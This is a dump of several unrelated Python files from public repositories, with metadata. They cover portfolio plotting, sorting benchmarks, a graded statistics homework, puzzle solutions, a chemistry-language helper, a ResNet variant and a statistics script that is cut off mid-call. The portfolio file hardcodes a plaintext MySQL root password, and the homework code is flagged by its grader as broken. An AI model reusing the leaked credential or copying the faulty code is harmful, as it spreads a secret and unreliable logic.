seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
33305365959 | # -*- coding: utf-8 -*-
"""
Created on Sun Jan 5 18:07:08 2020
@author: MichaelSchwarz
Evaluate a portfolio's exposure after different categorizations
"""
def evaluate_portfolio_exposure(FilterCompanies="all", CategoryType="GICS", DrilldownLevel=1):
"""gets the chosen companies with its categorisations from mySQL, adds prices and pie-charts it
In:
FilterCompanies -- Filter only for Companies in a certain group like CurrentPortfolio,...
CategoryType -- The main category for categorization
DrilldownLevel -- Granularity at which the categorization is displayed 1:5
"""
import sys
sys.path.append(r'C:\Users\MichaelSchwarz\PycharmProjects\FinanceProjects')
# checks
assert FilterCompanies in str(["all", "CurrentPortfolio"])
assert CategoryType in str(["GICS", "MSHN", "MSRC", "MSSC"])
assert DrilldownLevel in range(1, 6)
import MyFuncGeneral as My
cnx = My.cnx_mysqldb('fuyu')
if FilterCompanies != "CurrentPortfolio":
query = "select * from vcurrentportfolio p " + \
"inner join vexposurevalues_per_parent_cluster_and_issuer e on p.IssueID=e.IssuerID " + \
"where e.ParentClusterlevel=1 and p.unitsOwned<>0"
else:
query = "select * from vcurrentportfolio p " + \
"inner join vexposurevalues_per_parent_cluster_and_issuer e on p.IssueID=e.IssuerID " + \
"where e.ParentClusterlevel=1 and p.unitsOwned<>0"
import pandas as pd
comp_with_cat = pd.read_sql(query, con=cnx)
comp_with_cat['last_price'] = pd.Series(None, index=comp_with_cat.index)
# get last closing prices
for i in range(0, len(comp_with_cat)):
px = My.get_last_close(comp_with_cat.loc[i, 'Ticker_yahoo'])
comp_with_cat.loc[i, 'last_price'] = px
comp_with_cat['InvAmount'] = comp_with_cat.last_price * comp_with_cat.UnitsOwned
# plot
import plotly.express as px
fig = px.pie(comp_with_cat, values='InvAmount', names='Ticker_yahoo', title='My current Portfolio')
import plotly.io as pio
pio.renderers
pio.renderers.default = 'svg' # usingorca... -> static file
return fig
# fig.write_html('first_figure.html', auto_open=True)
# return(comp_with_cat)
# example
# FilterCompanies="all"; CategoryType="GICS";DrilldownLevel=1
# d=evaluate_portfolio_exposure(FilterCompanies="all", CategoryType="MSSC",DrilldownLevel=4)
# sunburst Chart
def evaluate_clusters_in_sunburst(most_inner_cluster):
import pandas as pd
import plotly.express as px
import sys
sys.path.append('C:/Users/MichaelSchwarz/.spyder-py3/myPyCode')
import mysql.connector
connection = mysql.connector.connect(host='localhost',
database='fuyu',
user='root',
password='mysql4michi')
cursor = connection.cursor()
cursor.callproc('usp_vpy_FilterMembercountForCluster', [most_inner_cluster])
results = [r.fetchall() for r in cursor.stored_results()]
dfres = pd.DataFrame(results[0], columns=['parent', 'child', 'members'])
dfres.to_dict()
fig = px.sunburst(
dfres,
names='child',
parents='parent',
values='members',
)
return fig
# example
#f = evaluate_clusters_in_sunburst(MostInnerCluster='MSHN')
#f
| schwarz777/FinanceProjects | PortfolioConstruction/evaluate_portfolio_exposure.py | evaluate_portfolio_exposure.py | py | 3,397 | python | en | code | 0 | github-code | 90 |
43459758035 | import os
import psutil
import tracemalloc
from collections import defaultdict
import cProfile
import time
import pandas as pd
import matplotlib.pyplot as plt
class Bucket_Sort:
def insertionSort(self, b):
for i in range(1, len(b)):
up = b[i]
j = i - 1
while j >= 0 and b[j] > up:
b[j + 1] = b[j]
j -= 1
b[j + 1] = up
return b
def bucketSort(self, x):
arr = []
slot_num = 10 # 10 means 10 slots, each
# slot's size is 0.1
for i in range(slot_num):
arr.append([])
# Put array elements in different buckets
for j in x:
index_b = int(slot_num * j)
arr[index_b].append(j)
# Sort individual buckets
for i in range(slot_num):
arr[i] = self.insertionSort(arr[i])
# concatenate the result
k = 0
for i in range(slot_num):
for j in range(len(arr[i])):
x[k] = arr[i][j]
k += 1
return x
def printList(self, arr):
for i in range(len(arr)):
print(arr[i], end=" ")
print()
if __name__ == "__main__":
start = time.time()
bucket_sort = Bucket_Sort()
dictionary = defaultdict()
# RSS and VMS used by the process
p = psutil.Process(os.getpid())
dictionary["rss - mb(s)"] = round(p.memory_info().rss / (1024 * 1024), 2)
dictionary["vms - mb(s)"] = round(p.memory_info().vms / (1024 * 1024), 2)
# CPU utilization
dictionary["cpu_usage - %"] = p.cpu_percent()
# memory used by the process
tracemalloc.start()
x = [0.20, 0.22, 0.43, 0.36, 0.39, 0.27]
print("Sorted Array is")
cProfile.run("bucket_sort.bucketSort(x)")
traced_mem = tracemalloc.get_traced_memory()
tracemalloc.stop()
end = time.time()
dictionary["memory_usage - mb(s)"] = round(traced_mem[1] / 1024, 2)
dictionary["exec_time - s"] = round(end - start, 2)
print(dictionary)
patches, texts = plt.pie(list(dictionary.values()), radius=0.5)
labels = [f"{i} - {j}" for i,j in zip(list(dictionary.keys()), list(dictionary.values()))]
plt.legend(patches, labels, loc="upper right", bbox_to_anchor = (0.4, 0.2))
plt.title("Bucket sort")
plt.savefig("BucketSort.png")
plt.show() | spoorthyg/System-and-User-level | bucketSort.py | bucketSort.py | py | 2,419 | python | en | code | 0 | github-code | 90 |
29206483838 | #Stuart- Nice start to your code, but incomplete. Where are the column names for the other two data sets?
# The code that you have for diamonds doesn't output a graph (it appears to be trying to make
# a grid of many, ~81, smaller graphs). Does your code know to skip columns that are non-numeric?
# You can get a bit over half your points back on this HW if you resubmit. You had mentioned in
# an email issues with finding the upper and lower bounds, I changed these lines to what I think you
#were looking for. Make sure to look at the objects returned by these lines to know if they are what you wanted.
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 22 19:30:15 2016
@author: verroejiba
"""
''' The crux of your challenge is to find a way to calculate a reasonable bin size
or number of bins given the scale of each numeric column and plot the distribution
using that optimal bin. In your code, you will need to test for severe outliers
that could hide the true shape of the distribution, separate that part of the data,
and plot histograms for both segments of the distribution. You will also need
to plot a boxplot of the entire distribution.'''
#Homework3
import pandas as pd
#import matplotlib.pyplot as plt
#import numpy as np
abalone = pd.read_csv('https://archive.ics.uci.edu/ml/machine-learning-databases/abalone/abalone.data')
abalone.columns =[]
income = pd.read_csv('https://archive.ics.uci.edu/ml/machine-learning-databases/adult/adult.data')
income.colummns = []
diamond = pd.read_csv('https://vincentarelbundock.github.io/Rdatasets/csv/Ecdat/Diamond.csv')
diamond.columns=['Number','Carat','Colour','Clarity','Certification','Price']
def optbin(file):
''' a function that calculate the optimal bin size using the Freedman Diaconis rule
bin size = 2(iqr(x)/(n^1/3))
Parameters:
file = the data to compute the bin size of
'''
loc_stat = file.describe() #gets the stat summary of the data
n = loc_stat.loc[['count']] #from summary get the size of the sample
Q1 = file.quantile(.25) #get the first quantile
Q3 = file.quantile(.75) #get the third quantile
IQR = Q3 - Q1 #compute the IQR range #not giving the right output, how can this be fixed?
bin_size = 2*(IQR/(n**(1/3))) #freedman rule
return bin_size
#optbin(diamond)
def dist(file):
'''A function that takes data as input, calculates the optimal bin size,
separate the outliers and print plots for histograms.
Parameter:
file - data to work on
'''
for c in file.columns.values :
bins = optbin(file)
Q1 = file.quantile(.25)[c]
Q3 = file.quantile(.75)[c]
lower = file[c].where(file[c]<(Q1 - (1.5*(Q3 - Q1)))) #this line needs review
upper = file[c].where(file[c]>(Q3 + (1.5*(Q3 - Q1))))#this line needs review
outliers = (file[c] < lower) | (file[c] > upper)
if outliers.empty == False :
outliers.hist(file[c],bins= bins[c]) #plot the segment of data with outliers
else:
outliers.hist() #plot the segment of data wherever there is no outliers
file[c].boxplot() #plot the boxplot of the values of each column with numerical inputs'''
#dist(diamond)
| Verroe/Ejiba_Verro_python | Ejiba_Verro_HW3_graded.py | Ejiba_Verro_HW3_graded.py | py | 3,267 | python | en | code | 0 | github-code | 90 |
13426898110 | # -*- coding: utf-8 -*-
"""
Created on Wed Sep 14 07:53:07 2022
@author: jgalb
"""
#taken mostly from geeksforgeeks
from sys import stdin
class beep:
def __init__(self, cl):
self.cl = cl
self.n = len(self.cl)
self.dist = [[401] * self.n for x in range(self.n)]
for i in range(len(self.cl)):
for j in range(len(self.cl)):
self.dist[i][j] = self.find_dist(self.cl[i], self.cl[j])
self.dist[0][self.n-1] = 401
self.dist[self.n-1][0] = 401
self.start_mask = 2**self.n - 1
self.min_list = [[-1] * self.n for _ in range(self.start_mask+1)]
def find_dist(self, a, b):
if a == b:
return(0)
else:
return(abs(a[0] - b[0]) + abs(a[1] - b[1]))
def find_min(self, mask, i):
if self.min_list[mask][i] != -1:
return(self.min_list[mask][i])
m = 400
if (1 << i | 1) == mask:
return(self.dist[0][i])
else:
for j in range(1,self.n):
if j != i and (mask & 1 << j):
m = min(m, self.find_min(mask & ~(1 << i), j) + self.dist[j][i])
self.min_list[mask][i] = m
return(m)
if __name__ == "__main__":
for i in range(int(stdin.readline())):
stdin.readline()
cl = []
start = [int(x) for x in stdin.readline().split()]
cl.append(start)
for j in range(int(stdin.readline())):
c = [int(x) for x in stdin.readline().split()]
cl.append(c)
cl.append(start)
if len(cl) == 2:
print(0)
else:
m = beep(cl)
ans = m.find_min(m.start_mask, m.n-1)
print(ans) | jgalbers12/CompetitiveProgramming2022 | beep/beep.py | beep.py | py | 1,747 | python | en | code | 0 | github-code | 90 |
28437541955 | import re
from collections import namedtuple
from typing import Dict, List
Rule = namedtuple("Rule", "min1 max1 min2 max2")
RulesDict = Dict[str, Rule]
Ticket = List[int]
TicketList = List[Ticket]
def parse_input(filename: str) -> (RulesDict, Ticket, TicketList):
with open(filename, "r") as file:
content = file.read()
rules_raw, mine_raw, other_raw = content.split("\n\n")
rules = {}
for r in rules_raw.split("\n"):
s = re.search(r"(.*): (\d*)-(\d*) or (\d*)-(\d*)", r)
key = s.group(1)
value = Rule(*[int(val) for val in s.groups()[1:]])
rules[key] = value
_, mine = mine_raw.split("\n")
mine = [int(val) for val in mine.split(",")]
other = []
for t in other_raw.split("\n")[1:]:
other.append([int(val) for val in t.split(",")])
return rules, mine, other
def check_rule(rule: Rule, val: int) -> bool:
return rule.min1 <= val <= rule.max1 or rule.min2 <= val <= rule.max2
def get_invalid_values_for_ticket(rules: RulesDict, ticket: Ticket) -> List[int]:
invalid_list = []
for value in ticket:
if any(check_rule(rule, value) for rule in rules.values()):
continue
invalid_list.append(value)
return invalid_list
def resolve_columns(rules: RulesDict, tickets: TicketList) -> Dict[int, str]:
"""
Alg:
1. If column matches only one rule, this is THE rule for this column.
2. Save result and remove this column and this rule from equation.
3. Repeat until all columns have matching rules.
"""
row_len = len(tickets[0])
column_results = {}
while len(column_results) < row_len:
for column_idx in range(row_len):
if column_idx in column_results:
# this column is already resolved
continue
column = [t[column_idx] for t in tickets]
matches = []
for rule_name, rule_values in rules.items():
if all(check_rule(rule_values, value) for value in column):
matches.append(rule_name)
if len(matches) == 1:
rule = matches[0]
column_results[column_idx] = rule
# we don't need this rule anymore
del rules[rule]
return column_results
def first(rules: RulesDict, other: TicketList) -> int:
invalid_sum = 0
for ticket in other:
invalid_sum += sum(get_invalid_values_for_ticket(rules, ticket))
return invalid_sum
def second(rules: RulesDict, mine: Ticket, other: TicketList) -> int:
valid_other = []
for ticket in other:
if not get_invalid_values_for_ticket(rules, ticket):
valid_other.append(ticket)
columns_map = resolve_columns(rules, valid_other)
result = 1
for column_idx, value in enumerate(mine):
if "departure" in columns_map[column_idx]:
result *= value
return result
def main():
rules, mine, other = parse_input("inputs/day16.txt")
print(first(rules, other))
print(second(rules, mine, other))
if __name__ == "__main__":
main()
| aboutroots/AoC2020 | day16.py | day16.py | py | 3,106 | python | en | code | 0 | github-code | 90 |
19254261095 | from sys import stdin
from collections import deque
moving_monkey = [[1, 0], [-1, 0], [0, 1], [0, -1]]
moving_horse = [[-2, 1], [-1, 2], [1, 2], [2, 1], [2, -1], [1, -2], [-1, -2], [-2, -1]]
stdin = open("./input.txt", "r")
k = int(stdin.readline())
cols, rows = map(int, stdin.readline().split())
grid = []
for _ in range(rows):
grid.append(stdin.readline().split())
visited = [[[False] * cols for _ in range(rows)] for _ in range(k + 1)]
def bfs():
queue = deque()
queue.append((0, 0, 0))
visited[0][0][0] = True
distance = -1
while queue:
size = len(queue)
distance += 1
for _ in range(size):
cur_row, cur_col, horse_count = queue.popleft()
# print(cur_row, cur_col, horse_count)
if cur_row == rows - 1 and cur_col == cols - 1:
return distance
for monkey_row, monkey_col in moving_monkey:
next_row = cur_row + monkey_row
next_col = cur_col + monkey_col
if 0 <= next_row < rows and 0 <= next_col < cols:
if not visited[horse_count][next_row][next_col] and grid[next_row][next_col] == "0":
queue.append((next_row, next_col, horse_count))
visited[horse_count][next_row][next_col] = True
if horse_count < k:
for horse_row, horse_col in moving_horse:
next_row = cur_row + horse_row
next_col = cur_col + horse_col
if 0 <= next_row < rows and 0 <= next_col < cols:
if not visited[horse_count + 1][next_row][next_col] and grid[next_row][next_col] == "0":
queue.append((next_row, next_col, horse_count + 1))
visited[horse_count + 1][next_row][next_col] = True
return -2
def main():
distance = bfs()
print(-1 if distance == -2 else distance)
if __name__ == '__main__':
main() | ag502/algorithm | Problem/BOJ_1600_말이 되고픈 원숭이/main.py | main.py | py | 1,995 | python | en | code | 1 | github-code | 90 |
30876008126 | # BOJ_27211_gold5-도넛행성
import sys
from collections import deque
input = sys.stdin.readline
dr = [-1, 1, 0, 0]
dc = [ 0, 0,-1, 1]
# 바운더리 연결
# def boundary(rc, num):
# if rc == 1: # rc 가 1이면 row
# if num == -1:
# return num + N
# return num % N
# else: # rc 가 2이면 column
# if num == -1:
# return num + M
# return num % M
def bfs():
cnt = 0
que = deque()
visited = set()
while zero_set:
cnt += 1
r, c = zero_set.pop()
que.append((r, c))
visited.add((r, c))
while que:
r, c = que.popleft()
for i in range(4):
# nr = boundary(1, dr[i] + r)
# nc = boundary(2, dc[i] + c)
nr = (dr[i] + r) % N
nc = (dc[i] + c) % M
if 0 <= nr < N and 0 <= nc < M and (nr, nc) not in visited:
if not map1[nr][nc]: # 숲이 아니면 que에 넣기
que.append((nr, nc))
zero_set.discard((nr, nc))
visited.add((nr, nc))
return cnt
N, M = map(int, input().split())
map1 = []
zero_set = set()
for i in range(N):
map1.append(list(map(int, input().split())))
for j, e in enumerate(map1[i]):
if e == 0:
zero_set.add((i, j))
print(bfs()) | Lee-hanbin/Algorithm | Python/BOJ/Gold/BOJ_27211_gold5-도넛행성/BOJ_27211_gold5-도넛행성.py | BOJ_27211_gold5-도넛행성.py | py | 1,433 | python | en | code | 3 | github-code | 90 |
70332876778 | import os.path
import sys
import math
def get_tx_ax(tmp):
return [0, tmp - 273] if tmp > 273 else [273 - tmp, 0]
def mov_ptr(target, ptr, arr):
mov = 0
while target != arr[ptr]:
if target < arr[ptr]:
mov -= 1
ptr -= 1
else:
mov += 1
ptr += 1
return ">" * mov if mov > 0 else "<" * -mov, ptr
if __name__ == "__main__":
filename = ""
while True:
print("Enter the filename:")
filename = input()
if os.path.isfile(filename):
break
print("Not a file, try again")
commands = []
reg_ops = ['}', ')', "'"]
main_ops = {
'MOVE': '@',
'TEMP': "$",
'ISOLATE': '#'
}
all_ints = set()
with open(filename, 'r') as file:
for line in file.readlines():
commands.append(line[:-1].split())
# print(commands)
for i in range(len(commands)):
if commands[i][0] == 'TEMP':
tmp = int(commands[i].pop())
commands[i].extend(get_tx_ax(tmp))
commands[i].append(commands[i].pop(0))
for j in range(len(commands[i]) - 1):
commands[i][j] = int(commands[i][j])
all_ints.add(commands[i][j])
all_ints = sorted(list(all_ints))
# print(commands)
# print(all_ints)
ptr = len(all_ints) - 1
init_str = ">".join(["+" * i for i in all_ints])
regs = [-1, -1, -1]
# print(ptr)
# print(init_str)
all_beakers = [[0] for i in range(10)]
# print(all_beakers)
chem_fuck_program = [init_str]
for command in commands:
string = ""
for i in range(len(command) - 1):
# if the register has already been set to the desired value
if i < len(reg_ops) and regs[i] == command[i]:
continue
# Shift the ptr, then set the register
shift, ptr = mov_ptr(command[i], ptr, all_ints)
string += shift
if i < len(reg_ops):
regs[i] = command[i]
string += reg_ops[i]
string += main_ops[command[-1]]
if command[-1] == 'MOVE' and command[1] <= 10:
all_beakers[command[0] - 1][0] += command[2]
all_beakers[command[1] - 1][0] -= command[2]
if len(all_beakers[command[0] - 1]) > 1:
print("MOVE from beaker " + str(command[0]) + " with multiple reagents")
elif command[-1] == 'ISOLATE' and command[1] <= 10:
all_beakers[command[1] - 1][0] -= command[2]
while len(all_beakers[command[0] - 1]) < command[3]:
all_beakers[command[0] - 1].append(0)
all_beakers[command[0] - 1][command[3] - 1] += command[2]
chem_fuck_program.append(string)
chem_fuck_program.append("~")
for line in chem_fuck_program:
print(line)
# print(all_beakers)
i = len(all_beakers) - 1
while i >= 0:
if sum(all_beakers[i]) <= 0:
all_beakers.pop(i)
i -= 1
min_reps = sys.maxsize
for beaker in all_beakers:
if 100 / sum(beaker) < min_reps:
min_reps = math.floor(100 / sum(beaker))
print("\nCan make recipe " + str(min_reps) + " times.")
once = []
total = []
for i in range(len(all_beakers)):
# string = "Beaker " + str(i + 1) + ": "
beaker_size = 50 if sum(all_beakers[i]) * min_reps <= 50 else 100
once_str = "+".join([str(i) for i in all_beakers[i]])
total_str = "+".join([str(i * min_reps) for i in all_beakers[i]])
once.append(once_str)
total.append(total_str + "/" + str(beaker_size))
string = once_str + " " + total_str + "/" + str(beaker_size)
print(string)
print()
for i in once:
print(i)
print()
for i in total:
print(i)
# print(min_reps)
#
| Bobtron/SpaceStation13Tools | ChemiCompilerCompiler/Standard/Driver.py | Driver.py | py | 3,871 | python | en | code | 0 | github-code | 90 |
18565110149 |
def main():
N = int(input())
a = sorted(map(int, input().split()),reverse=True) #降順のリスト
alice = 0
bob = 0
for i in range(N):
if i % 2 == 0:
alice += a[i]
else:
bob += a[i]
print(alice - bob)
if __name__ == "__main__":
main()
| Aasthaengg/IBMdataset | Python_codes/p03434/s648589478.py | s648589478.py | py | 317 | python | en | code | 0 | github-code | 90 |
40808682485 | from transformers import AutoTokenizer
from tqdm import tqdm
import pandas as pd
import argparse
MAX_LENGTH=512
parser = argparse.ArgumentParser(description='Tokenize para')
parser.add_argument('--data-a', type=str, required=True, help='one of the parallel data')
parser.add_argument('--data-b', type=str, required=True, help='another one of the parallel data')
parser.add_argument('--save-path', type=str, required=True, help='save path')
args = parser.parse_args()
if not args.data_a or not args.data_b:
print('Please input the data path')
exit()
def xml_tok(data,fout):
fout = open(fout, 'w', encoding='utf-8')
tok = AutoTokenizer.from_pretrained("xlm-roberta-base")
for line in tqdm(data):
word_pieces = tok.tokenize(line,add_special_tokens=True)
new_line = " ".join(word_pieces)
fout.write('{}\n'.format(new_line))
fout.close()
with open(args.data_a, 'r', encoding='utf-8') as f:
data_a = [ line.replace(" ","").replace('\n','') for line in f.readlines()]
with open(args.data_b, 'r', encoding='utf-8') as f:
data_b = [ line.replace('\n','') for line in f.readlines()]
assert len(data_a) == len(data_b)
data = list(zip(data_a,data_b))
xml_tok(data,args.save_path+'/processed.spm.all')
print("+++++++++done+++++++++")
| jazzisfuture/FineTuningXLM-R | script/tokenize_para.py | tokenize_para.py | py | 1,284 | python | en | code | 0 | github-code | 90 |
19143610635 | # Given a binary number ,find out its decimal representation. For eg 000111 in binary is 7 in decimal. Input Format
# The first line contains N , the number of binary numbers. Next N lines contain N integers each representing binary represenation of number.
# Output Format
# N lines,each containing a decimal equivalent of the binary number.
# Sample Input
# 4
# 101
# 1111
# 00110
# 111111
# Sample output
# 5
# 15
# 6
# 63
noOfTestCases=int(input("Enter the number of Test cases: "))
a=[]
for i in range(noOfTestCases):
a.insert(i,(input("")))
for i in range(len(a)):
temp=int(a[i])
sum=0
j=0
while temp:
one=temp%10
sum=sum+(one*(2**j))
j+=1
temp=int(temp/10)
print(sum)
| AasthaMehtaTech/DSA_Team12_Uplift_Project | Loops_Patterns_Print/InputOutput/RishabhVerma/Day2/P5.py | P5.py | py | 842 | python | en | code | 23 | github-code | 90 |
31722594168 | import math
import numpy as np
import torch
import torch.nn as nn
import torch.utils.model_zoo as model_zoo
import sys
sys.path.append("../")
from utils.pos_embed import get_2d_sincos_pos_embed
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class Decoder(nn.Module):
def __init__(self, planes, mlp_ratio=4):
super(Decoder, self).__init__()
self.tconv1 = nn.Sequential(
nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True),
nn.Conv2d(planes, planes // 2, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(planes // 2),
nn.ReLU(inplace=True)
) # 14 * 14
self.tconv2 = nn.Sequential(
nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True),
nn.Conv2d(planes // 2, planes // 4, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(planes // 4),
nn.ReLU(inplace=True)
) # 28 * 28
self.tconv3 = nn.Sequential(
nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True),
nn.Conv2d(planes // 4, planes // 8, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(planes // 8),
nn.ReLU(inplace=True)
) # 56 * 56
self.tconv4 = nn.Sequential(
nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True),
nn.Conv2d(planes // 8, planes // 16, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(planes // 16),
nn.ReLU(inplace=True)
) # 112 * 112
self.tconv5 = nn.Sequential(
nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True),
nn.Conv2d(planes // 16, 3, kernel_size=3, padding=1, bias=True),
) # 224 * 224
def forward(self, x):
x = self.tconv1(x)
x = self.tconv2(x)
x = self.tconv3(x)
x = self.tconv4(x)
x = self.tconv5(x)
return x
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers, fc_dim=128, in_channel=3, width=1, input_size=224, mix_ratio=0.5, mim=True):
self.inplanes = 64
super(ResNet, self).__init__()
self.conv1 = nn.Conv2d(in_channel, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.base = int(64 * width)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, self.base, layers[0])
self.layer2 = self._make_layer(block, self.base * 2, layers[1], stride=2)
self.layer3 = self._make_layer(block, self.base * 4, layers[2], stride=2)
self.layer4 = self._make_layer(block, self.base * 8, layers[3], stride=2)
self.out_ftr_size = self.base * 8 * block.expansion
self.avg_pool = nn.AdaptiveAvgPool2d((1, 1))
self.fc = nn.Linear(self.out_ftr_size, fc_dim)
self.pos_embed = nn.Parameter(torch.zeros(1, int(input_size // 4), int(input_size // 4), 64), requires_grad=False) # fixed sin-cos embedding
if mim:
self.mask_embed = nn.Parameter(torch.zeros(1, 64))
self.mix_ratio = mix_ratio
self.initialize_weights()
def initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
pos_embed = get_2d_sincos_pos_embed(self.pos_embed.shape[-1], int(self.pos_embed.size(1)), cls_token=False).reshape(self.pos_embed.size())
self.pos_embed.data.copy_(torch.from_numpy(pos_embed).float())
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def interpolate_pos_encoding(self, x):
b, c, w, h = x.size()
if w == self.pos_embed.size(1) and h == self.pos_embed.size(2):
return self.pos_embed
patch_pos_embed = self.pos_embed
dim = x.shape[-1]
# we add a small number to avoid floating point error in the interpolation
# see discussion at https://github.com/facebookresearch/dino/issues/8
w, h = w + 0.1, h + 0.1
patch_pos_embed = nn.functional.interpolate(
patch_pos_embed.permute(0, 3, 1, 2),
scale_factor=(w / self.pos_embed.size(1), h / self.pos_embed.size(2)),
mode='bicubic',
)
assert int(w) == patch_pos_embed.shape[-2] and int(h) == patch_pos_embed.shape[-1]
patch_pos_embed = patch_pos_embed.permute(0, 2, 3, 1)
return patch_pos_embed
def add_pos_embed(self, x, position):
assert x.size(-2) == 56 and x.size(-1) == 56
b, c, w, h = x.size()
pos_embed = get_2d_sincos_pos_embed(self.pos_embed.shape[-1], int(self.pos_embed.size(1)), cls_token=False).reshape(self.pos_embed.size())
if w == self.pos_embed.size(1) and h == self.pos_embed.size(2):
return self.pos_embed
def forward(self, x, target_pos_embed=None):
"""
target_pos_embed: [b, 64, h ,w]
"""
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = x + self.interpolate_pos_encoding(x).permute(0, 3, 1, 2)
outs = []
if target_pos_embed is not None:
masked_query = target_pos_embed + self.mask_embed.unsqueeze(-1).unsqueeze(-1)
x = self.mix_ratio * masked_query + (1 - self.mix_ratio) * x
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
return x
def resnet18(fc_dim=128, pretrained=False, **kwargs):
"""Constructs a ResNet-18 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = ResNet(BasicBlock, [2, 2, 2, 2], fc_dim = fc_dim , **kwargs)
return model
def resnet50(fc_dim=128,pretrained=False, **kwargs):
"""Constructs a ResNet-50 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = ResNet(Bottleneck, [3, 4, 6, 3], fc_dim = fc_dim , **kwargs)
return model
# model = resnet50()
# input_ = torch.randn([4, 3, 224, 224])
# target_pos = torch.randn([4, 64, 56, 56])
# outs = model(input_, target_pos)
# print([out.size() for out in outs])
| shaofeng-z/SimConvMIM | utils/resnet.py | resnet.py | py | 9,175 | python | en | code | 0 | github-code | 90 |
72571084778 | import numpy as np
from metodos_quantitativos import MetodosQuantitativos, Metodo2kr, UmFator
if __name__ == "__main__":
m = MetodosQuantitativos()
print("\n------ 6 a)")
a = [17, 12, 9, 11, 14, 12]
b = [20, 6, 10, 12, 15, 7, 9, 10]
confidence = 0.9
m.observacoes_nao_pareadas(a=a, b=b, confidence=confidence)
print("\n----- 6 b)")
a = [17, 12, 9, 11, 14, 12]
b = [20, 6, 10, 12, 15, 7, 9, 10]
confidence = 0.95
m.t_test(confidence=confidence, a=a, b=b)
print("\n----- 6 c)")
a = [17, 12, 9, 11, 14, 12]
confidence = 0.95
erro = 10
m.tamanho_do_modelo_para_erro_maximo(erro=erro, confidence=confidence, a=a)
# print("\n----- tamanho proporcao")
# confidence = 0.9
# p = 0.5
# m.tamanho_do_modelo_para_erro_maximo_para_amostra(erro, confidence, p, n_original, r)
print("\n---- 6 d)")
p = 0.333
confidence = 0.95
n = 6
m._intervalo_de_confianca_de_um_lado_proporcao(p, confidence, n, "superior")
print("\n---- 6 e)")
confidence = 0.95
a = [17, 12, 9, 11, 14, 12]
b = [21, 18, 8, 13, 17, 17]
m.observacoes_pareadas(confidence=confidence, a=a, b=b)
print("\n---- 6 f)")
confidence = 0.975
a = [17, 12, 9, 11, 14, 12]
b = [21, 18, 8, 13, 17, 17]
m.observacoes_pareadas_intervalo_de_confianca_de_um_lado(a=a, b=b, confidence=confidence, type='superior', decimals=6)
# 7 a e b
# fazer manualmente
print("\n---- 7 c)")
a = [70, 74, 64, 68, 72, 78, 71, 64]
m.tamanho_do_modelo_para_erro_maximo(erro=1, confidence=0.95, a=a)
print("\n--- 7 d)")
confidence = 0.6
x_a = 70.125
variance_a = 4.7939*4.7939
n_a = 8
x_b = 72
variance_b = 3.6*3.6
n_b = 10
m.t_test(confidence=confidence, n_a=n_a, n_b=n_b, x_a=x_a, x_b=x_b,
